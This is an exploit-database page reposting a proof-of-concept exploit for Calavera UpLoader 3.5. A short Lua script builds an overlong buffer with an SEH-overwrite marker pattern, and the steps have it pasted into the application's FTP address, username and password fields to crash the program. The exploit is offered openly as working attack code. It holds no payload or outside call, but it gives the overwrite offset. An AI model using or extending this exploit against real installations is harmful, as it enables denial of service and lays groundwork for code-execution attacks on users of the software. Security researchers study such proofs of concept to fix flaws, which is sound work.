Advertisement






Calavera UpLoader 3.5 - 'FTP Logi' Denial of Service (PoC + SEH Overwrite)

CVE Category Price Severity
N/A CWE-264 N/A High
Author Risk Exploitation Type Date
N/A High Remote 2021-01-04
CPE
cpe:cpe:/a:calavera:uploader:3.5.039
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021010024

Below is a copy:

Calavera UpLoader 3.5 - 'FTP Logi' Denial of Service (PoC + SEH Overwrite)
-- Title : Calavera UpLoader 3.5 - 'FTP Logi' Denial of Service (PoC + SEH Overwrite).
-- Courtesy of Rmulo, @uromulou - Date : 04/01/2021.

-- PoC < Proof of Concept:
--
-- 1 -> Run the lua script, to create file "poc.dat"...
-- 2 -> Copy the content of the new file "poc.dat" to clipboard...
-- 3 -> Open the application...
-- 4 -> Click on "Settings"...
-- 5 -> Paste contents of the generated file into the parameters "FTP Address", "Username and Password". Furthermore, check the box with the statement "Check to save password in preferences"...
-- 6 -> Down...
--


print("-> Calavera UpLoader 3.5 - 'FTP Logi' Denial of Service (PoC + SEH Overwrite)")
print("-> This exploit was written by Rmulo, @uromulou.")

local buffer = string.rep("A", 477) .. "BBBB" .. "CCCC" .. string.rep("\xff", 2000)

file = io.open("poc.dat", "w")
file:write(buffer)
file:close()

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.